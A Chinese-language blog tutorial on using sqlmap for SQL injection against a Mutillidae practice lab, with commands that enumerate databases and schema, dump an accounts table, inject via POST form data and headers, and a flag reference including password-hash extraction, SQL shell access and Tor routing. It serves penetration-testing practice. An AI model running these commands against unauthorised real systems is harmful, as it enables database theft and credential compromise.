以前都是手动注入今天开始使用工具sqlmap .
1. 首先使用GET方法来inject, 使用GET方法注入很简单 eg:
要注入的页面是:
-
http://192.168.0.105/mutillidae/index.php?page=user-info.php
命令如下:
-
#use sqlmap to check whether the URL are injectable
-
sqlmap -u ""
-
-
#列出所有数据库
-
sqlmap -u "" --dbs
-
-
#列出当前用户
-
sqlmap -u "" --current-user
-
-
#列出所有的表和表结构
-
sqlmap -u "" --schema
-
-
#dump all the data from table
-
sqlmap -u "" --columns -T accounts -D owasp10 --dump
2. 使用POST方法注入:
重点在当POST data的时候,Always specify the submit parameter name and its default value.
例如我尝试注入如下页面:
-
http://192.168.0.119/mutillidae/index.php?page=login.php
正确的写法是:
-
sqlmap -u "" --data="username=admin&password=admin&login-php-submit-button=login" --dbs
-
#如果写成下面,得到的结果是not injectable.
-
sqlmap -u "" --data="username=admin&password=admin" --dbs
3. sqlmap 会自动的parse form.
因此也可以这样用:
-
sqlmap --forms -u "" --dbs
4. 有些时候,可以test HTTP headers. 使用--level
-
sqlmap --forms -u "" --dbs --level 5
5. sqlmap的其他一些参数:
-
sqlmap -r [HTTP_FILE]
-
--method: method for post or get.
-
--data: pass the parameter
-
-p: specify the injectable field.
-
-f: Performs extension fingerprint of the database.
-
-b: Retrieves the DBMS banner.
-
--sql-shell: accesses the SQL shell prompt after successful exploitation.
-
--schema: Enumerates the database schema.
-
--comments: searches for comments in the database.
-
--reg-read: Reads a Windows registry key value.
-
--identify-waf: identifies WAF/IPS protection.
-
-
Enumeration:
-
These options can be used to enumerate the back-end database
-
management system information, structure and data contained in the
-
tables. Moreover you can run your own SQL statements
-
-
-a, --all Retrieve everything
-
-b, --banner Retrieve DBMS banner
-
--current-user Retrieve DBMS current user
-
--current-db Retrieve DBMS current database
-
--passwords Enumerate DBMS users password hashes
-
--tables Enumerate DBMS database tables
-
--columns Enumerate DBMS database table columns
-
--schema Enumerate DBMS schema
-
--dump Dump DBMS database table entries
-
--dump-all Dump all DBMS databases tables entries
-
-D DB DBMS database to enumerate
-
-T TBL DBMS database table(s) to enumerate
-
-C COL DBMS database table column(s) to enumerate
-
-
#The important arguments that are available for you are -
-
-
-u : This is the most important parameter, because this is where you give the url where the request is supposed to be made.( For a POST request make sure you give the correct url i.e the place where the corresponding form is posting rather than the page where the form is present :P)
-
--data : When you provide this argument with some data, sqlmap will perform POST requests automatically. The POST data of a request can be written directly, if help needed use some tool like ZAP or Burp Suite or Live HTTP Headers to get the post data
-
--threads=5 #5线程
-
-
#Some other important arguments that are usefull -
-
-
--proxy : This is used when you wish to tunnel all your requests through a proxy. The protocol must also be mentioned here.
-
--proxy-cred : This is used to provide credentials for proxy server.
-
--tor : This allows you to use tor anonymity network.( –tor-port & –tor-type are used if these settings are different from the default values )
参考资料:
Sqlmap usage:
阅读(778) | 评论(0) | 转发(0) |
